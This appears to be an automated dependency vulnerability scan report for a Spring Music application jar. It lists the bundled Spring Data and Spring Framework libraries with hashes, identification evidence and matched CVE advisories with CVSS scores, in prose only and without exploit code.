Spring Data module for JPA repositories. File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-data-jpa-2.0.6.RELEASE.jarMD5: 47aae6a594965bf41a1120b75a690a13SHA1: 02c683dfbd06551bfd6cc7e05f9d13f5c54c79baSHA256: e5b2b64c68ab1b2d04727ff49fc7d35921c06d1be7accfae6abc80cbb86cb1f7
Evidence Type Source Name Value Confidence Vendor file name spring-data-jpa High Vendor hint analyzer vendor pivotal software Highest Vendor hint analyzer vendor SpringSource Highest Vendor hint analyzer vendor vmware Highest Vendor jar package name data Highest Vendor jar package name jpa Highest Vendor jar package name springframework Highest Vendor Manifest automatic-module-name spring.data.jpa Medium Vendor pom artifactid spring-data-jpa Low Vendor pom groupid org.springframework.data Highest Vendor pom name Spring Data JPA High Vendor pom parent-artifactid spring-data-parent Low Vendor pom parent-groupid org.springframework.data.build Medium Vendor pom url http://projects.spring.io/spring-data-jpa Highest Product file name spring-data-jpa High Product jar package name data Highest Product jar package name jpa Highest Product jar package name springframework Highest Product Manifest automatic-module-name spring.data.jpa Medium Product Manifest Implementation-Title Spring Data JPA High Product pom artifactid spring-data-jpa Highest Product pom groupid org.springframework.data Highest Product pom name Spring Data JPA High Product pom parent-artifactid spring-data-parent Medium Product pom parent-groupid org.springframework.data.build Medium Product pom url http://projects.spring.io/spring-data-jpa Medium Version Manifest Implementation-Version 2.0.6.RELEASE High Version pom version 2.0.6.RELEASE Highest
CVE-2019-3797 (OSSINDEX) suppress
This affects Spring Data JPA in versions up to and including 2.1.5, 2.0.13 and 1.11.19. Derived queries using any of the predicates ‘startingWith’, ‘endingWith’ or ‘containing’ could return more results than anticipated when a maliciously crafted query parameter value is supplied. Also, LIKE expressions in manually defined queries could return unexpected results if the parameter values bound did not have escaped reserved characters properly. CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3:
Base Score: MEDIUM (5.300000190734863) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework.data:spring-data-jpa:2.0.6.RELEASE:*:*:*:*:*:*:* CVE-2019-3802 (OSSINDEX) suppress
This affects Spring Data JPA in versions up to and including 2.1.6, 2.0.14 and 1.11.20. ExampleMatcher using ExampleMatcher.StringMatcher.STARTING, ExampleMatcher.StringMatcher.ENDING or ExampleMatcher.StringMatcher.CONTAINING could return more results than anticipated when a maliciously crafted example value is supplied. CWE-155 Improper Neutralization of Wildcards or Matching Symbols
CVSSv3:
Base Score: MEDIUM (5.300000190734863) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework.data:spring-data-jpa:2.0.6.RELEASE:*:*:*:*:*:*:* spring-music-sqldb-1.0.jar: spring-data-keyvalue-2.0.6.RELEASE.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-data-keyvalue-2.0.6.RELEASE.jarMD5: 67b923530200be45290959020039e2f6SHA1: 196bdab74df54f58eb8af77127235fe360c79f50SHA256: 807b74576b9b2aa23c14a77c7a9763b84671b9a933600fa7f7544366c1f036c6
Evidence Type Source Name Value Confidence Vendor file name spring-data-keyvalue High Vendor hint analyzer vendor pivotal software Highest Vendor hint analyzer vendor SpringSource Highest Vendor hint analyzer vendor vmware Highest Vendor jar package name data Highest Vendor jar package name keyvalue Highest Vendor jar package name springframework Highest Vendor Manifest automatic-module-name spring.data.keyvalue Medium Vendor pom artifactid spring-data-keyvalue Low Vendor pom groupid org.springframework.data Highest Vendor pom name Spring Data KeyValue High Vendor pom parent-artifactid spring-data-parent Low Vendor pom parent-groupid org.springframework.data.build Medium Product file name spring-data-keyvalue High Product jar package name data Highest Product jar package name keyvalue Highest Product jar package name springframework Highest Product Manifest automatic-module-name spring.data.keyvalue Medium Product Manifest Implementation-Title Spring Data KeyValue High Product pom artifactid spring-data-keyvalue Highest Product pom groupid org.springframework.data Highest Product pom name Spring Data KeyValue High Product pom parent-artifactid spring-data-parent Medium Product pom parent-groupid org.springframework.data.build Medium Version Manifest Implementation-Version 2.0.6.RELEASE High Version pom version 2.0.6.RELEASE Highest
spring-music-sqldb-1.0.jar: spring-data-mongodb-2.0.6.RELEASE.jarDescription:
MongoDB support for Spring Data File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-data-mongodb-2.0.6.RELEASE.jarMD5: 74ec3fbe42441e68b2c467f98414888bSHA1: ee9fedc59c82ae75021ac1277f73ec87146670fdSHA256: 1583dc32c5e39b78f3c0b452349830791be0740cf9b4fb291d65cf94ecadb265
Evidence Type Source Name Value Confidence Vendor file name spring-data-mongodb High Vendor hint analyzer vendor pivotal software Highest Vendor hint analyzer vendor SpringSource Highest Vendor hint analyzer vendor vmware Highest Vendor jar package name core Highest Vendor jar package name data Highest Vendor jar package name mongodb Highest Vendor jar package name springframework Highest Vendor Manifest automatic-module-name spring.data.mongodb Medium Vendor pom artifactid spring-data-mongodb Low Vendor pom groupid org.springframework.data Highest Vendor pom name Spring Data MongoDB - Core High Vendor pom parent-artifactid spring-data-mongodb-parent Low Product file name spring-data-mongodb High Product jar package name core Highest Product jar package name data Highest Product jar package name mongodb Highest Product jar package name springframework Highest Product Manifest automatic-module-name spring.data.mongodb Medium Product Manifest Implementation-Title Spring Data MongoDB - Core High Product pom artifactid spring-data-mongodb Highest Product pom groupid org.springframework.data Highest Product pom name Spring Data MongoDB - Core High Product pom parent-artifactid spring-data-mongodb-parent Medium Version Manifest Implementation-Version 2.0.6.RELEASE High Version pom version 2.0.6.RELEASE Highest
CVE-2022-22980 suppress
A Spring Data MongoDB application is vulnerable to SpEL Injection when using @Query or @Aggregation-annotated query methods with SpEL expressions that contain query parameter placeholders for value binding if the input is not sanitized. CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: spring-data-redis-2.0.6.RELEASE.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-data-redis-2.0.6.RELEASE.jarMD5: b8e45b2e68ce0102fe7598df1c127e66SHA1: bbe9a86b233e3bee31b396231a46a36905da9fb9SHA256: 021ce83a42ae11aa7143a1c6b8449a1de18de8f29dfbd9706475ec100b700cfc
Evidence Type Source Name Value Confidence Vendor file name spring-data-redis High Vendor hint analyzer vendor pivotal software Highest Vendor hint analyzer vendor SpringSource Highest Vendor hint analyzer vendor vmware Highest Vendor jar package name data Highest Vendor jar package name redis Highest Vendor jar package name springframework Highest Vendor Manifest automatic-module-name spring.data.redis Medium Vendor pom artifactid spring-data-redis Low Vendor pom groupid org.springframework.data Highest Vendor pom name Spring Data Redis High Vendor pom parent-artifactid spring-data-parent Low Vendor pom parent-groupid org.springframework.data.build Medium Product file name spring-data-redis High Product jar package name data Highest Product jar package name redis Highest Product jar package name springframework Highest Product Manifest automatic-module-name spring.data.redis Medium Product Manifest Implementation-Title Spring Data Redis High Product pom artifactid spring-data-redis Highest Product pom groupid org.springframework.data Highest Product pom name Spring Data Redis High Product pom parent-artifactid spring-data-parent Medium Product pom parent-groupid org.springframework.data.build Medium Version Manifest Implementation-Version 2.0.6.RELEASE High Version pom version 2.0.6.RELEASE Highest
spring-music-sqldb-1.0.jar: spring-expression-5.0.5.RELEASE.jarDescription:
Spring Expression Language (SpEL) License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0 File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-expression-5.0.5.RELEASE.jar
MD5: 9677c528a2215d259d6ff0d820d1b415
SHA1: fc6c7a95aeb7d00f4c65c338b08d97767eb0dd99
SHA256: 0b935cc876323f04c9ad0015d7cb304f15fd62486d28e73e4f98ed1ed2dff828
Evidence Type Source Name Value Confidence Vendor central artifactid spring-expression Highest Vendor central groupid org.springframework Highest Vendor file name spring-expression High Vendor hint analyzer vendor pivotal software Highest Vendor hint analyzer vendor SpringSource Highest Vendor hint analyzer vendor vmware Highest Vendor jar package name expression Highest Vendor jar package name expression Low Vendor jar package name spel Low Vendor jar package name springframework Low Vendor Manifest automatic-module-name spring.expression Medium Vendor pom artifactid spring-expression Low Vendor pom developer email jhoeller@pivotal.io Low Vendor pom developer id jhoeller Medium Vendor pom developer name Juergen Hoeller Medium Vendor pom groupid org.springframework Highest Vendor pom name Spring Expression Language (SpEL) High Vendor pom organization name Spring IO High Vendor pom organization url http://projects.spring.io/spring-framework Medium Vendor pom url spring-projects/spring-framework Highest Product central artifactid spring-expression Highest Product file name spring-expression High Product hint analyzer product springsource_spring_framework Highest Product jar package name expression Highest Product jar package name expression Low Product jar package name spel Low Product Manifest automatic-module-name spring.expression Medium Product Manifest Implementation-Title spring-expression High Product pom artifactid spring-expression Highest Product pom developer email jhoeller@pivotal.io Low Product pom developer id jhoeller Low Product pom developer name Juergen Hoeller Low Product pom groupid org.springframework Highest Product pom name Spring Expression Language (SpEL) High Product pom organization name Spring IO Low Product pom organization url http://projects.spring.io/spring-framework Low Product pom url spring-projects/spring-framework High Version central version 5.0.5.RELEASE Highest Version Manifest Implementation-Version 5.0.5.RELEASE High Version pom version 5.0.5.RELEASE Highest
CVE-2022-22965 suppress
CISA Known Exploited Vulnerability: Product: VMware Spring Framework Name: Spring Framework JDK 9+ Remote Code Execution Vulnerability Date Added: 2022-04-04 Description: Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. Required Action: Apply updates per vendor instructions. Due Date: 2022-04-25 Notes: https://nvd.nist.gov/vuln/detail/CVE-2022-22965
A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. CWE-94 Improper Control of Generation of Code ('Code Injection')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - US_GOVERNMENT_RESOURCE security@vmware.com - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY security@vmware.com - MITIGATION,VENDOR_ADVISORY security@vmware.com - PATCH,THIRD_PARTY_ADVISORY security@vmware.com - PATCH,THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2018-1258 suppress
Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted. CWE-863 Incorrect Authorization
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P References:
OSSINDEX - [CVE-2018-1258] CWE-863: Incorrect Authorization OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1258 OSSIndex - https://jira.spring.io/browse/SPR-16757 OSSIndex - https://pivotal.io/security/cve-2018-1258 af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2024-22259 suppress
Applications that use UriComponentsBuilder in Spring Framework to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html attack or to a SSRF attack if the URL is used after passing validation checks.
This is the same as CVE-2024-22243 https://spring.io/security/cve-2024-22243 , but with different input. CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2018-11040 suppress
Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser requests. Both are not enabled by default in Spring Framework nor Spring Boot, however, when MappingJackson2JsonView is configured in an application, JSONP support is automatically ready to use through the "jsonp" and "callback" JSONP parameters, enabling cross-domain requests. CWE-829 Inclusion of Functionality from Untrusted Control Sphere
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
OSSINDEX - [CVE-2018-11040] CWE-829: Inclusion of Functionality from Untrusted Control Sphere OSSINDEX - [CVE-2018-11040] CWE-829: Inclusion of Functionality from Untrusted Control Sphere OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11040 OSSIndex - https://jira.spring.io/browse/SPR-16798 OSSIndex - https://pivotal.io/security/cve-2018-11040 af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - MAILING_LIST,THIRD_PARTY_ADVISORY security_alert@emc.com - MITIGATION,VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2018-15756 suppress
Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controller returns an org.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of ranges, or with wide ranges that overlap, or both, for a denial of service attack. This vulnerability affects applications that depend on either spring-webmvc or spring-webflux. Such applications must also have a registration for serving static resources (e.g. JS, CSS, images, and others), or have an annotated controller that returns an org.springframework.core.io.Resource. Spring Boot applications that depend on spring-boot-starter-web or spring-boot-starter-webflux are ready to serve static resources out of the box and are therefore vulnerable. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
OSSINDEX - [CVE-2018-15756] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15756 OSSIndex - https://pivotal.io/security/cve-2018-15756 af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - NOT_APPLICABLE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,URL_REPURPOSED,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - MAILING_LIST,THIRD_PARTY_ADVISORY security_alert@emc.com - NOT_APPLICABLE,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,URL_REPURPOSED,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-5398 suppress
In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a "Content-Disposition" header in the response where the filename attribute is derived from user supplied input. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), CWE-494 Download of Code Without Integrity Check
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.6) Vector: /AV:N/AC:H/Au:N/C:C/I:C/A:C References:
Vulnerable Software & Versions: (show all )
CVE-2018-1257 suppress
Spring Framework, versions 5.0.x prior to 5.0.6, versions 4.3.x prior to 4.3.17, and older unsupported versions allows applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a regular expression, denial of service attack. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P References:
OSSINDEX - [CVE-2018-1257] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1257 OSSIndex - https://jira.spring.io/browse/SPR-16731 OSSIndex - https://pivotal.io/security/cve-2018-1257 af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-5421 suppress
In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N/E:1.3/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.6) Vector: /AV:N/AC:H/Au:S/C:P/I:P/A:N References:
OSSINDEX - [CVE-2020-5421] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5421 OSSIndex - https://tanzu.vmware.com/security/cve-2020-5421 af854a3a-2127-422b-91ae-364da2661108 - NOT_APPLICABLE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security@pivotal.io - NOT_APPLICABLE,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - THIRD_PARTY_ADVISORY security@pivotal.io - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-22950 suppress
n Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2023-20861 suppress
In Spring Framework versions 6.0.0 - 6.0.6, 5.3.0 - 5.3.25, 5.2.0.RELEASE - 5.2.22.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition. CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2023-20863 (OSSINDEX) suppress
In spring framework versions prior to 5.2.24 release+ ,5.3.27+ and 6.0.8+ , it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-expression:5.0.5.RELEASE:*:*:*:*:*:*:* CVE-2018-11039 suppress
Spring Framework (versions 5.0.x prior to 5.0.7, versions 4.3.x prior to 4.3.18, and older unsupported versions) allow web applications to change the HTTP request method to any HTTP method (including TRACE) using the HiddenHttpMethodFilter in Spring MVC. If an application has a pre-existing XSS vulnerability, a malicious user (or attacker) can use this filter to escalate to an XST (Cross Site Tracing) attack. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
